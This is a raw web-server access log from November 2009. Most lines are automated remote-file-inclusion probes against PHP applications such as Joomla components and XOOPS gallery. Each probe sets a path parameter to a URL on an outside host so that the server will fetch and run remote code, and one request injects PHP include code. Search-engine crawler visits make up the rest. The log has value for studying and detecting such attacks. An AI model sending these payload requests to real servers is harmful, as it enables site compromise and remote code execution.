69.64.75.54 - - [12/Nov/2009:02:31:07 -0600] "GET /main.php?appserv_root=http://pastie.org/661597.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
69.64.75.54 - - [12/Nov/2009:02:31:08 -0600] "GET /logs/main.php?appserv_root=http://pastie.org/661597.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
69.64.75.54 - - [12/Nov/2009:02:31:08 -0600] "GET /logs/access_log.1231200000/main.php?appserv_root=http://pastie.org/661597.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
69.64.75.54 - - [12/Nov/2009:02:31:09 -0600] "GET /logs/access_log.1237766400/main.php?appserv_root=http://pastie.org/661597.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
65.55.106.203 - - [12/Nov/2009:02:31:27 -0600] "GET /logs/access_log.1255046400 HTTP/1.1" 200 1059667 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
190.95.231.98 - - [12/Nov/2009:02:31:36 -0600] "GET /logs////skin/uks_gallery_v3010//write.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
190.95.231.98 - - [12/Nov/2009:02:31:36 -0600] "GET ////skin/uks_gallery_v3010//write.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
190.95.231.98 - - [12/Nov/2009:02:31:36 -0600] "GET /logs/access_log.1246233600////skin/uks_gallery_v3010//write.php?dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
65.55.109.35 - - [12/Nov/2009:02:31:42 -0600] "GET /logs/access_log.1221436800 HTTP/1.1" 200 11198 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4325; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.2)"
65.55.110.66 - - [12/Nov/2009:02:32:18 -0600] "GET /logs/access_log.1166832000 HTTP/1.1" 200 2190 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30707; InfoPath.2)"
65.55.110.93 - - [12/Nov/2009:02:32:59 -0600] "GET /logs/access_log.1184457600 HTTP/1.1" 200 1640 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.30729)"
216.245.220.82 - - [12/Nov/2009:02:33:02 -0600] "GET /myevent.php?myevent_path=http://pastie.org/661597.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
216.245.220.82 - - [12/Nov/2009:02:33:02 -0600] "GET /logs/access_log.1253145600/myevent.php?myevent_path=http://pastie.org/661597.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.245.220.82 - - [12/Nov/2009:02:33:02 -0600] "GET /logs/myevent.php?myevent_path=http://pastie.org/661597.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
216.245.220.82 - - [12/Nov/2009:02:33:02 -0600] "GET /logs/access_log.1253318400/myevent.php?myevent_path=http://pastie.org/661597.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.86.146.15 - - [12/Nov/2009:02:34:07 -0600] "GET //inc/cmses/aedating4CMS.php?dir[inc]=http://www.nopaste.pl/Source/hbb.txt?&mode=id HTTP/1.1" 404 310 "-""-"
216.245.220.82 - - [12/Nov/2009:02:34:50 -0600] "GET /logs/access_log.1250812800/myevent.php?myevent_path=http://pastie.org/661597.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
65.55.110.164 - - [12/Nov/2009:02:38:29 -0600] "GET /logs/access_log.1156550400 HTTP/1.1" 200 329 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
65.55.51.110 - - [12/Nov/2009:02:40:23 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
190.95.231.98 - - [12/Nov/2009:02:40:35 -0600] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
190.95.231.98 - - [12/Nov/2009:02:40:35 -0600] "GET /logs/access_log.1239753600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
190.95.231.98 - - [12/Nov/2009:02:40:35 -0600] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
85.214.74.222 - - [12/Nov/2009:02:40:45 -0600] "GET /logs/access_log.1239753600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
85.214.74.222 - - [12/Nov/2009:02:40:45 -0600] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
85.214.74.222 - - [12/Nov/2009:02:40:45 -0600] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
157.100.230.82 - - [12/Nov/2009:02:40:50 -0600] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
157.100.230.82 - - [12/Nov/2009:02:40:50 -0600] "GET /logs/access_log.1239753600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
157.100.230.82 - - [12/Nov/2009:02:40:50 -0600] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
190.95.231.98 - - [12/Nov/2009:02:40:54 -0600] "GET /logs/access_log.1245110400//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
65.55.51.110 - - [12/Nov/2009:02:40:55 -0600] "GET /logs/access_log.1207008000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
85.214.74.222 - - [12/Nov/2009:02:40:57 -0600] "GET /logs/access_log.1245110400//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
157.100.230.82 - - [12/Nov/2009:02:41:05 -0600] "GET /logs/access_log.1245110400//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
64.8.105.21 - - [12/Nov/2009:02:41:32 -0600] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.atdreamholiday.com//smf/Themes/.safe?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
64.8.105.21 - - [12/Nov/2009:02:41:32 -0600] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.atdreamholiday.com//smf/Themes/.safe?? HTTP/1.1" 404 296 "-""libwww-perl/5.79"
218.234.21.12 - - [12/Nov/2009:02:45:36 -0600] "GET /logs/access_log.1239753600//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://vcs2020.org/bbs/data/bbs/Data/zfxid1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
218.234.21.12 - - [12/Nov/2009:02:45:36 -0600] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://vcs2020.org/bbs/data/bbs/Data/zfxid1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
218.234.21.12 - - [12/Nov/2009:02:45:36 -0600] "GET /logs/access_log.1239753600//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://vcs2020.org/bbs/data/bbs/Data/zfxid1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
218.234.21.12 - - [12/Nov/2009:02:45:36 -0600] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://vcs2020.org/bbs/data/bbs/Data/zfxid1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
218.234.21.12 - - [12/Nov/2009:02:45:36 -0600] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://vcs2020.org/bbs/data/bbs/Data/zfxid1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
218.234.21.12 - - [12/Nov/2009:02:45:36 -0600] "GET /logs/access_log.1244592000//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://vcs2020.org/bbs/data/bbs/Data/zfxid1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
218.234.21.12 - - [12/Nov/2009:02:45:36 -0600] "GET /logs/access_log.1244592000//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://vcs2020.org/bbs/data/bbs/Data/zfxid1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
218.234.21.12 - - [12/Nov/2009:02:45:39 -0600] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://vcs2020.org/bbs/data/bbs/Data/zfxid1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
193.47.80.46 - - [12/Nov/2009:02:46:14 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
193.47.80.46 - - [12/Nov/2009:02:46:14 -0600] "GET / HTTP/1.1" 200 3245 "-""Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
85.25.94.14 - - [12/Nov/2009:02:47:02 -0600] "GET /logs/access_log.1242000000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 376 "-""libwww-perl/5.803"
85.25.94.14 - - [12/Nov/2009:02:47:02 -0600] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.803"
85.25.94.14 - - [12/Nov/2009:02:47:02 -0600] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 354 "-""libwww-perl/5.803"
85.25.94.14 - - [12/Nov/2009:02:47:02 -0600] "GET /logs/access_log.1244160000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 376 "-""libwww-perl/5.803"
65.55.109.16 - - [12/Nov/2009:02:49:43 -0600] "GET /logs/access_log.1118361600 HTTP/1.1" 200 330 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.40607)"
78.129.214.28 - - [12/Nov/2009:02:49:45 -0600] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://oxigent.fileave.com/azka.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
78.129.214.28 - - [12/Nov/2009:02:49:45 -0600] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://oxigent.fileave.com/azka.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
78.129.214.28 - - [12/Nov/2009:02:49:47 -0600] "GET /logs/access_log.1239062400//admin/spaw/spaw_control.class.php?spaw_root=http://oxigent.fileave.com/azka.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
62.141.47.10 - - [12/Nov/2009:02:50:49 -0600] "GET /logs/access_log.1249171200/2%20skin/simple_ucc/setup.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
62.141.47.10 - - [12/Nov/2009:02:50:49 -0600] "GET /logs/2%20skin/simple_ucc/setup.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
62.141.47.10 - - [12/Nov/2009:02:50:49 -0600] "GET /2%20skin/simple_ucc/setup.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
65.55.110.28 - - [12/Nov/2009:02:51:13 -0600] "GET /logs/access_log.1147996800 HTTP/1.1" 200 1867 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4325; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
204.232.149.234 - - [12/Nov/2009:02:53:33 -0600] "GET /components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://www.palco.tv/tcm/logs/idxx.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
204.232.149.234 - - [12/Nov/2009:02:53:33 -0600] "GET /logs/components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://www.palco.tv/tcm/logs/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
204.232.149.234 - - [12/Nov/2009:02:53:34 -0600] "GET /logs/access_log.1252800000/components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://www.palco.tv/tcm/logs/idxx.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
204.232.149.234 - - [12/Nov/2009:02:54:13 -0600] "GET /logs/components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://www.palco.tv/tcm/logs/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
204.232.149.234 - - [12/Nov/2009:02:54:13 -0600] "GET /components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://www.palco.tv/tcm/logs/idxx.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
204.232.149.234 - - [12/Nov/2009:02:54:14 -0600] "GET /logs/access_log.1252800000/components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://www.palco.tv/tcm/logs/idxx.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
65.55.109.44 - - [12/Nov/2009:02:55:09 -0600] "GET /logs/access_log.1202256000 HTTP/1.1" 200 1904 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4325; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30707; MS-RTC LM 8)"
65.55.110.173 - - [12/Nov/2009:02:55:11 -0600] "GET /logs/access_log.1223683200 HTTP/1.1" 200 12185 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SLCC1)"
72.55.165.80 - - [12/Nov/2009:02:55:50 -0600] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://m-aryaco.com/test/id.txt??%0D?? HTTP/1.1" 404 351 "-""libwww-perl/5.805"
72.55.165.80 - - [12/Nov/2009:02:55:50 -0600] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://m-aryaco.com/test/id.txt??%0D?? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
69.36.4.40 - - [12/Nov/2009:02:55:50 -0600] "GET /db.php?path_local=http://www.mysecl.com/board/editor/id12.txt??? HTTP/1.1" 404 289 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:02:55:50 -0600] "GET /logs/db.php?path_local=http://www.mysecl.com/board/editor/id12.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:02:55:51 -0600] "GET /logs/access_log.1253491200/db.php?path_local=http://www.mysecl.com/board/editor/id12.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:02:56:15 -0600] "GET /db.php?path_local=http://www.mysecl.com/board/editor/id12.txt??? HTTP/1.1" 404 289 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:02:56:15 -0600] "GET /logs/db.php?path_local=http://www.mysecl.com/board/editor/id12.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:02:56:15 -0600] "GET /logs/access_log.1253491200/db.php?path_local=http://www.mysecl.com/board/editor/id12.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:02:56:27 -0600] "GET /db.php?path_local=http://www.mysecl.com/board/editor/id12.txt??? HTTP/1.1" 404 289 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:02:56:29 -0600] "GET /logs/db.php?path_local=http://www.mysecl.com/board/editor/id12.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:02:56:29 -0600] "GET /logs/db.php?path_local=http://www.mysecl.com/board/editor/id12.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:02:56:29 -0600] "GET /logs/access_log.1253491200/db.php?path_local=http://www.mysecl.com/board/editor/id12.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:02:56:29 -0600] "GET /logs/access_log.1253491200/db.php?path_local=http://www.mysecl.com/board/editor/id12.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:02:56:32 -0600] "GET /db.php?path_local=http://www.mysecl.com/board/editor/id12.txt??? HTTP/1.1" 404 289 "-""Mozilla/5.0"
65.55.110.130 - - [12/Nov/2009:02:56:33 -0600] "GET /logs/access_log.1232064000 HTTP/1.1" 200 120936 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"
69.36.4.40 - - [12/Nov/2009:02:56:44 -0600] "GET /logs/access_log.1252454400/db.php?path_local=http://www.mysecl.com/board/editor/id12.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:02:56:54 -0600] "GET /db.php?path_local=http://www.mysecl.com/board/editor/id12.txt??? HTTP/1.1" 404 289 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:02:56:54 -0600] "GET /logs/db.php?path_local=http://www.mysecl.com/board/editor/id12.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:02:56:56 -0600] "GET /db.php?path_local=http://www.mysecl.com/board/editor/id12.txt??? HTTP/1.1" 404 289 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:02:56:56 -0600] "GET /logs/access_log.1253491200/db.php?path_local=http://www.mysecl.com/board/editor/id12.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:02:56:59 -0600] "GET /logs/db.php?path_local=http://www.mysecl.com/board/editor/id12.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:02:56:59 -0600] "GET /logs/access_log.1253491200/db.php?path_local=http://www.mysecl.com/board/editor/id12.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:02:57:02 -0600] "GET /logs/access_log.1253491200/db.php?path_local=http://www.mysecl.com/board/editor/id12.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:02:57:02 -0600] "GET /logs/db.php?path_local=http://www.mysecl.com/board/editor/id12.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:02:57:02 -0600] "GET /db.php?path_local=http://www.mysecl.com/board/editor/id12.txt??? HTTP/1.1" 404 289 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:02:57:08 -0600] "GET /logs/access_log.1253491200/db.php?path_local=http://www.mysecl.com/board/editor/id12.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:02:57:14 -0600] "GET /logs/db.php?path_local=http://www.mysecl.com/board/editor/id12.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:02:57:14 -0600] "GET /db.php?path_local=http://www.mysecl.com/board/editor/id12.txt??? HTTP/1.1" 404 289 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:02:57:15 -0600] "GET /logs/access_log.1252454400/db.php?path_local=http://www.mysecl.com/board/editor/id12.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:02:57:20 -0600] "GET /logs/access_log.1252454400/db.php?path_local=http://www.mysecl.com/board/editor/id12.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
65.55.107.236 - - [12/Nov/2009:02:58:39 -0600] "GET /logs/access_log.1167004800 HTTP/1.1" 200 1370 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4325; .NET CLR 2.0.40607; .NET CLR 3.0.04506.648)"
65.55.110.145 - - [12/Nov/2009:02:59:09 -0600] "GET /logs/access_log.1245283200 HTTP/1.1" 200 695135 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4325; .NET CLR 2.0.40607; .NET CLR 3.0.04506.648)"
210.116.122.88 - - [12/Nov/2009:03:02:26 -0600] "GET /?INCLUDE_FOLDER=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
210.116.122.88 - - [12/Nov/2009:03:02:27 -0600] "GET /logs/access_log.1254009600/?INCLUDE_FOLDER=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
210.116.122.88 - - [12/Nov/2009:03:02:39 -0600] "GET /logs/?INCLUDE_FOLDER=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
210.116.122.88 - - [12/Nov/2009:03:02:47 -0600] "GET /logs/access_log.1246406400/?INCLUDE_FOLDER=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
67.205.28.190 - - [12/Nov/2009:03:03:20 -0600] "GET /logs//components/com_ajaxchat/tests/ajcuser.php?GLOBALS[mosConfig_absolute_path]=http://m-aryaco.com/test/id.txt??%0D?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
67.205.28.190 - - [12/Nov/2009:03:03:20 -0600] "GET //components/com_ajaxchat/tests/ajcuser.php?GLOBALS[mosConfig_absolute_path]=http://m-aryaco.com/test/id.txt??%0D?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
69.36.4.40 - - [12/Nov/2009:03:04:18 -0600] "GET /logs/access_log.1252454400/db.php?path_local=http://www.mysecl.com/board/editor/id12.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:03:04:24 -0600] "GET /logs/access_log.1252454400/db.php?path_local=http://www.mysecl.com/board/editor/id12.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
69.64.75.54 - - [12/Nov/2009:03:04:27 -0600] "GET /join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://pastie.org/661597.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
69.64.75.54 - - [12/Nov/2009:03:04:27 -0600] "GET /logs/access_log.1247443200/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://pastie.org/661597.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
69.64.75.54 - - [12/Nov/2009:03:04:27 -0600] "GET /logs/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://pastie.org/661597.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:03:04:29 -0600] "GET /logs/access_log.1252454400/db.php?path_local=http://www.mysecl.com/board/editor/id12.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
69.64.75.54 - - [12/Nov/2009:03:04:31 -0600] "GET /logs/access_log.1232236800/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://pastie.org/661597.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
69.36.4.40 - - [12/Nov/2009:03:04:55 -0600] "GET /logs/access_log.1252454400/db.php?path_local=http://www.mysecl.com/board/editor/id12.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
220.181.7.29 - - [12/Nov/2009:03:05:11 -0600] "GET /logs/access_log.1234051200 HTTP/1.1" 200 112812 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
67.205.28.190 - - [12/Nov/2009:03:05:24 -0600] "GET /logs/components/com_ajaxchat/tests/ajcuser.php?GLOBALS[mosConfig_absolute_path]=http://m-aryaco.com/test/id.txt??%0D?? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
67.205.28.190 - - [12/Nov/2009:03:05:24 -0600] "GET /components/com_ajaxchat/tests/ajcuser.php?GLOBALS[mosConfig_absolute_path]=http://m-aryaco.com/test/id.txt??%0D?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
65.55.109.124 - - [12/Nov/2009:03:06:04 -0600] "GET /logs/access_log.1132272000 HTTP/1.1" 200 3964 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322; .NET CLR 2.0.40607; .NET CLR 3.0.04506.648)"
62.103.31.24 - - [12/Nov/2009:03:06:38 -0600] "GET /logs/access_log.1239753600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
62.103.31.24 - - [12/Nov/2009:03:06:38 -0600] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
62.103.31.24 - - [12/Nov/2009:03:06:38 -0600] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
62.103.31.24 - - [12/Nov/2009:03:06:54 -0600] "GET /logs/access_log.1245110400//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
65.55.207.47 - - [12/Nov/2009:03:09:18 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
202.131.226.52 - - [12/Nov/2009:03:09:47 -0600] "GET ////?_SERVER[DOCUMENT_ROOT]=http://ipodbot.fileave.com/id1.txt????????????????? HTTP/1.1" 200 3247 "-""Mozilla/5.0"
202.131.226.52 - - [12/Nov/2009:03:09:47 -0600] "GET /logs/access_log.1242172800////?_SERVER[DOCUMENT_ROOT]=http://ipodbot.fileave.com/id1.txt????????????????? HTTP/1.1" 404 313 "-""Mozilla/5.0"
202.131.226.52 - - [12/Nov/2009:03:10:05 -0600] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://ipodbot.fileave.com/id1.txt????????????????? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
65.55.207.47 - - [12/Nov/2009:03:10:55 -0600] "GET /logs/access_log.1131667200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
116.68.248.199 - - [12/Nov/2009:03:13:59 -0600] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://buntutkud4.fileave.com/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
116.68.248.199 - - [12/Nov/2009:03:13:59 -0600] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://buntutkud4.fileave.com/fx29id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
116.68.248.199 - - [12/Nov/2009:03:13:59 -0600] "GET /logs/access_log.1251504000/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://buntutkud4.fileave.com/fx29id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
216.86.146.15 - - [12/Nov/2009:03:14:16 -0600] "GET //photoalb/lib/static/header.php?set_menu=http://www.nopaste.pl/Source/hbb.txt?&mode=id HTTP/1.1" 404 314 "-""-"
116.68.248.199 - - [12/Nov/2009:03:14:20 -0600] "GET /logs/access_log.1251072000/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://buntutkud4.fileave.com/fx29id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
66.163.197.88 - - [12/Nov/2009:03:14:21 -0600] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
66.163.197.88 - - [12/Nov/2009:03:14:21 -0600] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
